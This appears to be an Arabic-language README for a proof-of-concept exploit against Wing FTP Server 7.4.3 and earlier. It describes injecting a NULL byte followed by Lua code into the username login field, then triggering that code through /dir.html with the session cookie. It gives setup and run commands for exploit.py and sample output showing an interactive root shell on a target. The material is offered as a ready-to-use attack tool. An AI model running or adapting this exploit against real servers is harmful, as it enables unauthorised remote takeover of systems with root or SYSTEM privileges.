
ثغرة تنفيذ كود عن بعد غير مصادق عليها في Wing FTP Server <= 7.4.3.
ثغرة تنفيذ كود عن بعد غير مصدق في Wing FTP Server <= 7.4.3. يؤدي حقن بايت NULL في المعامل
usernameأثناء تسجيل الدخول إلى كتابة كود Lua في ملف الجلسة. عند الوصول إلى/dir.htmlباستخدام الكوكي الخاص بالجلسة الناتج، يتم تنفيذ الكود المحقون — بصلاحيات الجذر (root) على لينكس أو SYSTEM على ويندوز.
/loginok.html يحقن بايت NULL متبوعاً بكود Lua في حقل username./dir.html مع كوكي UID المُرجَع يؤدي إلى تشغيل كود Lua المحقون.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
مثال:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root